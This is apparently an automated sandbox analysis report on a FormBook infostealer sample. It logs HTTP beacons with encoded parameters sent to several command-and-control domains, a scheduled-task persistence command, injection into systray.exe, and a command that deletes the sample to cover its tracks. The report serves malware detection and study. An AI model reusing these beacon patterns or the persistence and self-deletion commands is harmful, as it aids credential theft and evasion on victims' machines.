                                                                                  Jan 27, 2021 03:20:34.217921019 CET6002OUTGET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1
                                                                                  Host: www.ribbonredwhiteandblue.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jan 27, 2021 03:20:34.334295034 CET6003INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 27 Jan 2021 02:20:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "600b4d17-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  5192.168.2.4497703.140.151.20980C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 03:20:54.743021011 CET6004OUTGET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1
                                                                                  Host: www.merckcbd.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jan 27, 2021 03:20:54.855285883 CET6004INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Jan 2021 02:20:54 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 153
                                                                                  Connection: close
                                                                                  Server: nginx/1.16.1
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  6192.168.2.44977623.253.11.19480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 03:21:37.569669008 CET6128OUTGET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1
                                                                                  Host: www.nl22584.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jan 27, 2021 03:21:37.690046072 CET6128INHTTP/1.1 404 Not Found
                                                                                  Server: Apache
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Date: Wed, 27 Jan 2021 02:21:37 GMT
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: close
                                                                                  Content-Length: 203
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 65 69 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dei5/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  7192.168.2.449777198.54.117.21580C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 03:21:58.444051027 CET6129OUTGET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1
                                                                                  Host: www.vasquez.photos
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  8192.168.2.449778143.92.60.9780C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 03:22:19.516143084 CET6130OUTGET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT HTTP/1.1
                                                                                  Host: www.0343888.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jan 27, 2021 03:22:19.765439034 CET6130INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Jan 2021 02:16:31 GMT
                                                                                  Location: https://www.0343888.com/dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT
                                                                                  Content-Length: 0
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  9192.168.2.449781198.49.23.14480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Jan 27, 2021 03:23:25.598913908 CET6131OUTGET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1
                                                                                  Host: www.formabench.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Jan 27, 2021 03:23:25.702712059 CET6133INHTTP/1.1 400 Bad Request
                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                  Content-Length: 77564
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Date: Wed, 27 Jan 2021 02:23:25 UTC
                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                  Pragma: no-cache
                                                                                  Server: Squarespace
                                                                                  X-Contextid: YeQKyqTT/oPFyeKM6
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Start time:03:16:23
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\quote20210126.exe.exe'
                                                                                  Imagebase:0xad0000
                                                                                  File size:946176 bytes
                                                                                  MD5 hash:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:03:16:26
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp'
                                                                                  Imagebase:0x1000000
                                                                                  File size:185856 bytes
                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:03:16:26
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:03:16:26
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Imagebase:0x10000
                                                                                  File size:946176 bytes
                                                                                  MD5 hash:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:03:16:27
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Imagebase:0x3a0000
                                                                                  File size:946176 bytes
                                                                                  MD5 hash:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:03:16:28
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Imagebase:0x2f0000
                                                                                  File size:946176 bytes
                                                                                  MD5 hash:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:03:16:28
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\quote20210126.exe.exe
                                                                                  Imagebase:0x890000
                                                                                  File size:946176 bytes
                                                                                  MD5 hash:1685762EB9EB252F560A5E7A33F78EF1
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  General

                                                                                  Start time:03:16:30
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:03:16:44
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                  Imagebase:0xa20000
                                                                                  File size:851968 bytes
                                                                                  MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:03:16:45
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\systray.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                  Imagebase:0x8b0000
                                                                                  File size:9728 bytes
                                                                                  MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:03:16:48
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\quote20210126.exe.exe'
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:03:16:49
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >